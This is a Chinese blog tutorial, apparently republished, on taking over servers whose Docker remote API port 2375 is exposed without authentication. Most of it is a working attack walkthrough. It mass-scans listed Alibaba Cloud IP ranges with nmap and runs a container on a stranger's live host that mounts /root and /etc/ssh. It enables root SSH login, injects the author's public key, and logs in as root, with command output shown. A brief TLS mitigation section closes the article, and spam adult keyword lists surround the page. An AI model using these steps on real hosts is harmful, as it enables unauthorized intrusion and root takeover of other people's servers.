亚洲综合原千岁中文字幕_国产精品99久久久久久久vr_无码人妻aⅴ一区二区三区浪潮_成人h动漫精品一区二区三

主頁 > 知識(shí)庫 > Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法

Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法

熱門標(biāo)簽:地圖標(biāo)注能更改嗎 廈門防封電銷電話卡 高德地圖標(biāo)注公司需要錢 外呼系統(tǒng)全國 云南電商智能外呼系統(tǒng)哪家好 宜賓銷售外呼系統(tǒng)軟件 地圖標(biāo)注員有發(fā)展前景嗎 濰坊寒亭400電話辦理多少錢 四川保險(xiǎn)智能外呼系統(tǒng)

相信了解過docker remote API的同學(xué)對2375端口都不陌生了,2375是docker遠(yuǎn)程操控的默認(rèn)端口,通過這個(gè)端口可以直接對遠(yuǎn)程的docker daemon進(jìn)行操作。

當(dāng)$HOST主機(jī)以docker daemon -H=0.0.0.0:2375方式啟動(dòng)daemon時(shí),可以在外部機(jī)器對$HOST的docker daemon進(jìn)行直接操作:

docker -H tcp://$HOST:2375 ps

好,說說如何“入侵”,怎么通過這個(gè)端口入侵宿主機(jī)呢?

這個(gè)應(yīng)該要從幾個(gè)點(diǎn)說起吧:
1. docker對user namespace沒有做隔離,也就是說,容器內(nèi)部的root用戶就是宿主機(jī)的root用戶,一旦掛載目錄,就可以在容器內(nèi)部以宿主機(jī)的root用戶身份對掛載的文件系統(tǒng)隨意修改了。

  • docker服務(wù)擁有很高的執(zhí)行權(quán)利(相當(dāng)于root),并且在docker用戶組下的普通用戶不需要任何其他驗(yàn)證就可以執(zhí)行docker run等命令。
  • 暴露的docker remote API端口如果沒有啟動(dòng)ssl驗(yàn)證的話,任何能連通到這臺(tái)docker宿主機(jī)的的機(jī)器都可以隨意操作這臺(tái)docker宿主機(jī)的docker daemon(docker run、docker ps、docker rm等等這些命令都不在話下)。

結(jié)合以上3點(diǎn),就基本具備入侵docker宿主機(jī)的條件了

講得似乎有點(diǎn)懸,不多說,直接拿一個(gè)活鮮鮮的例子來講吧:

(請?jiān)试S我用最近新學(xué)的一道菜將流程帶過 ╮( ̄▽ ̄)╭ )

秘制紅燒肉(docker版)

材料:一整塊一整塊的“5花”IP段,越肥越好(小白用戶越多越好)

配料:nmap,docker

step 1: 掃描2375端口

怎么掃?我選用的是簡單易用的黑客必備神器nmap了。

掃哪里呢?我選的目標(biāo)是aliyun的IP段,百度得知:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 
42.120.0.0/16 Aliyun Computing Co., LTD China 
42.121.0.0/16 Aliyun Computing Co., LTD China 
42.156.128.0/17 Aliyun Computing Co., LTD China 
110.75.0.0/16 Asia Pacific Network Information Centre China 
110.76.0.0/19 Ali Technology Co., Ltd China 
110.76.32.0/20 Aliyun Computing Co., LTD China 
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 
112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 
119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
140.205.0.0/16 Aliyun Computing Co., LTD China 
203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 
218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 
223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.

我不生產(chǎn)IP,我只是百度的搬運(yùn)工,別問我這些IP從那來,我也想知道~ >.<

將上面IP內(nèi)容保存在一個(gè)文件中,如 aliyun.list

開始掃描:

cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open 
# 簡單解釋一下命令:
# awk 將第一列IP網(wǎng)段過濾出來
# xargs 將過濾出來的IP一個(gè)一個(gè)的分次送給nmap,-I {} 是指使用{}來代替?zhèn)魉偷膮?shù)
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...

不到兩分鐘,第一塊42.96.MOSAIC.MOSAIC(五花肉已打碼) “五花肉”選好了,來吧~

step 2: 測試2375的直接控制權(quán)

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps
 
# CONTAINER ID IMAGE    COMMAND   CREATED  STATUS  PORTS  
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh"  9 days ago  Up 3 days  0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2   "rethinkdb --bind all" 9 days ago  Up 3 days  8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago  Up 3 days  0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine   "nginx -g 'daemon off" 3 weeks ago  Up 3 days  443/tcp, 0.0.0.0
# ...

這個(gè)服務(wù)器的owner也太配合了(⊙ο⊙),ps直接看到內(nèi)容,說明這個(gè)主機(jī)的2375是沒有ssl驗(yàn)證的,基本滿足入侵要求。

“五花”洗好,切好,準(zhǔn)備下鍋~

step 3: 遠(yuǎn)程啟動(dòng)自己的容器

拿到了docker的控制權(quán)能做什么呢?拿到了就呵呵了~

# images 看看本地已有的鏡像
# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images
# ...
# swarm    latest  47dc182ea74b 4 weeks ago  19.32 MB
# jwilder/nginx-proxy  latest  203b20631e41 4 weeks ago  255.6 MB
# ubuntu    latest  c5f1cf30c96b 4 weeks ago  120.8 MB
# shipyard/shipyard   latest  ba426f0944bc 5 weeks ago  58.92 MB
# ...

省略了一部分輸出,鏡像還蠻多的,就選個(gè)ubuntu吧

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

看到這步,相信對ssh有一些了解的同學(xué)應(yīng)該就明白了

step 4: ssh pub key 注入

在剛剛啟動(dòng)的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主機(jī)的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes,允許root通過ssh登錄

然后在你的機(jī)器上生成一對新的pub key(已經(jīng)有ssh key的也建議生成一個(gè)新的,不要使用自己日常使用的ssh pub key)

# 使用 ssh-keygen生成
ssh-keygen -t rsa -C "hello@world.com"
# 執(zhí)行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆蓋了,可以選著/tmp/id_rsa
# 其他提示enter到底即可

繼續(xù),注入ssh pub key,回到剛剛啟動(dòng)的容器執(zhí)行

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # 這里粘貼你剛剛在自己機(jī)器生成的/tmp/id_rsa.pub
>EOF
 
# 如果/tmp/root/.ssh目錄不存在,就直接創(chuàng)建

八角香葉生抽老抽醋都加上,中火烹飪,準(zhǔn)備出鍋~

step 5: 登入服務(wù)器

# ssh -i 指定秘鑰登錄
ssh -i /tmp/id_rsa root@42.96.MOSAIC.MOSAIC
 
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

大火收汁,起鍋!

鄭重聲明

以上教程僅為交流學(xué)習(xí)之用,42.96.MOSAIC.MOSAIC 服務(wù)器上的id_rsa.pub在制作完本教程后已主動(dòng)清除,并在服務(wù)上留言告知。

如果你一不小心也發(fā)現(xiàn)了可用的2375端口,希望也能點(diǎn)到即止,誤做他用,或者發(fā)現(xiàn)其他入侵漏洞,可以和大家交流學(xué)習(xí)。

2375是docker漏洞嗎?

非也!2375直接裸露地暴露在公網(wǎng)上純屬是用戶習(xí)慣或者偷懶的問題2375可以在相對安全的內(nèi)部網(wǎng)絡(luò)中方便測試使用,并不適合使用在投入到生產(chǎn)環(huán)境中。

docker官網(wǎng)第一篇文檔quick start上有句話是這樣子的:

Warning: Changing the default docker daemon binding to a TCP port or
Unix docker user group will increase your security risks by allowing
non-root users to gain root access on the host. Make sure you control
access to docker. If you are binding to a TCP port, anyone with
access to that port has full Docker access; so it is not advisable
 on an open network.

已經(jīng)Warning告知:如果將daemon直接暴露在一個(gè)TCP端口,將可能會(huì)被以非root用戶去獲取宿主機(jī)的root權(quán)限。其實(shí)上面的說提到的服務(wù)器之所以這么容器被入侵,也正是這個(gè)原因。

何以防之

那么,問題來了,如果想用Remote API,又不想有被入侵的風(fēng)險(xiǎn),怎么辦呢?

docker官方文檔上介紹了一種通過CA認(rèn)證方式使用Remote API

具體可以參考:Protect the Docker daemon socket

(等理解了再補(bǔ)一篇博客吧,就姑且讓我以一個(gè)鏈接的形式帶過吧O.O)

配置過程還算是比較簡單的,下面放一張圖,展示配置SSL后的效果:

到此這篇關(guān)于Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法的文章就介紹到這了,更多相關(guān)docker 暴露2375 端口內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

標(biāo)簽:巴彥淖爾 紅河 廣安 廊坊 湛江 回訪 德州 滁州

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法》,本文關(guān)鍵詞  Docker,暴露,2375,端口,導(dǎo)致,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法》相關(guān)的同類信息!
  • 本頁收集關(guān)于Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    国产91丝袜高跟系列| 九九精品影院| 韩国三级视频网站| 国产一区二区精品在线观看| 欧美国产日韩在线| 精品国产三级a∨在线观看| 国产伦精品一区二区三区无广告 | 亚洲www美色| 久久久成人影院| 欧美国产日韩久久久| 国产一区二区精品在线观看| 日本在线不卡视频| 国产伦精品一区二区三区无广告 | 麻豆午夜视频| 美女免费毛片| 91麻豆精品国产自产在线 | 日日爽天天| 毛片的网站| 欧美一区二区三区性| 美女免费毛片| 中文字幕一区二区三区 精品| 久久精品道一区二区三区| 韩国毛片免费大片| 国产麻豆精品免费密入口| 成人影视在线观看| 欧美1区| 四虎影视库| 精品国产一级毛片| 四虎久久影院| 香蕉视频久久| 国产一区免费在线观看| 国产国语在线播放视频| 国产成人啪精品视频免费软件| 欧美激情伊人| 久久精品免视看国产明星| 欧美α片无限看在线观看免费| 国产不卡高清| 午夜在线亚洲男人午在线| 久久精品人人做人人爽97| 精品国产一区二区三区免费 | 成人免费网站视频ww| 国产视频久久久| 欧美国产日韩在线| 精品久久久久久免费影院| 四虎影视久久久| 欧美激情在线精品video| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 高清一级片| 精品国产三级a∨在线观看| 韩国三级香港三级日本三级la | 国产美女在线观看| 国产91素人搭讪系列天堂| 韩国三级香港三级日本三级la | 深夜做爰性大片中文| 国产麻豆精品hdvideoss| 精品国产香蕉在线播出| 黄色免费三级| 精品在线观看一区| 国产成人精品综合| 精品国产一区二区三区免费| 高清一级毛片一本到免费观看| 九九干| 日韩中文字幕在线亚洲一区| 欧美a级片视频| 午夜欧美成人久久久久久| 精品国产亚洲一区二区三区| 精品国产三级a| 黄视频网站在线看| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 日韩在线观看免费| 久久99这里只有精品国产| 青青久热| 韩国三级香港三级日本三级| 国产亚洲免费观看| 午夜激情视频在线播放| 九九久久国产精品大片| 日韩欧美一二三区| 九九九网站| 午夜精品国产自在现线拍| 日韩中文字幕在线亚洲一区| 一级女人毛片人一女人| 精品国产亚洲一区二区三区| 欧美国产日韩精品| 精品视频一区二区| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 韩国三级一区| 九九九网站| 日韩在线观看网站| 久久99中文字幕久久| 国产美女在线一区二区三区| 国产一区二区精品久久91| 九九久久99综合一区二区| 日本特黄特黄aaaaa大片 | 久久福利影视| 欧美一区二区三区在线观看| 九九精品在线| 亚洲精品中文字幕久久久久久| 一a一级片| 99久久精品国产麻豆| 国产精品自拍一区| 精品国产亚洲一区二区三区| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 欧美激情伊人| 国产麻豆精品高清在线播放| 你懂的日韩| 国产成人精品综合久久久| 午夜在线亚洲| 精品视频在线观看免费| 韩国毛片免费| 欧美日本免费| 夜夜操网| 国产精品免费久久| 国产麻豆精品免费视频| 国产一区二区精品| 亚洲第一页乱| 日韩在线观看网站| 韩国三级视频网站| 毛片高清| 午夜激情视频在线播放| 欧美激情在线精品video| 国产视频一区在线| 久久久久久久男人的天堂| 国产原创视频在线| 一a一级片| 日韩在线观看免费| 亚洲 激情| 久久国产一久久高清| 午夜在线亚洲| 成人a大片在线观看| 国产一区二区福利久久| 久久精品免视看国产成人2021| 国产国语对白一级毛片| 精品国产一区二区三区国产馆| 国产伦理精品| 亚洲第一色在线| 亚洲wwwwww| 成人a级高清视频在线观看| 精品久久久久久影院免费| 一级毛片视频在线观看| 欧美大片aaaa一级毛片| 香蕉视频久久| 精品视频在线看| 国产高清在线精品一区a| 高清一级毛片一本到免费观看| 国产韩国精品一区二区三区| 国产一区二区精品久| 国产网站免费| 国产成人精品综合久久久| 欧美国产日韩精品| 香蕉视频久久| 久久99这里只有精品国产| 国产韩国精品一区二区三区| 日韩欧美一二三区| 成人高清免费| 超级乱淫伦动漫| 国产一区二区精品久久91| 91麻豆精品国产自产在线| 久久精品店| 国产麻豆精品免费视频| 色综合久久天天综线观看| 欧美另类videosbestsex高清| 亚洲天堂在线播放| 一级毛片视频播放| 欧美激情伊人| 日韩一级黄色片| 免费的黄视频| 久草免费在线观看| 夜夜操网| 成人免费观看网欧美片| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 精品国产香蕉伊思人在线又爽又黄| 免费国产在线视频| 亚洲精品永久一区| 欧美日本免费| 免费毛片基地| 精品视频在线观看免费| 亚欧视频在线| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 亚洲精品永久一区| 色综合久久天天综合观看| 国产视频网站在线观看| 精品久久久久久影院免费| 日本在线不卡视频| 九九久久国产精品大片| 成人在激情在线视频| 成人a大片在线观看| 超级乱淫伦动漫| 韩国三级一区| 精品视频在线看| 亚洲精品永久一区| 国产激情一区二区三区| 免费国产在线观看| 一级毛片视频播放| 久久国产精品自线拍免费| 尤物视频网站在线| 青青久久精品| 香蕉视频久久| 精品国产一区二区三区久| 国产一区二区精品久| 国产激情一区二区三区|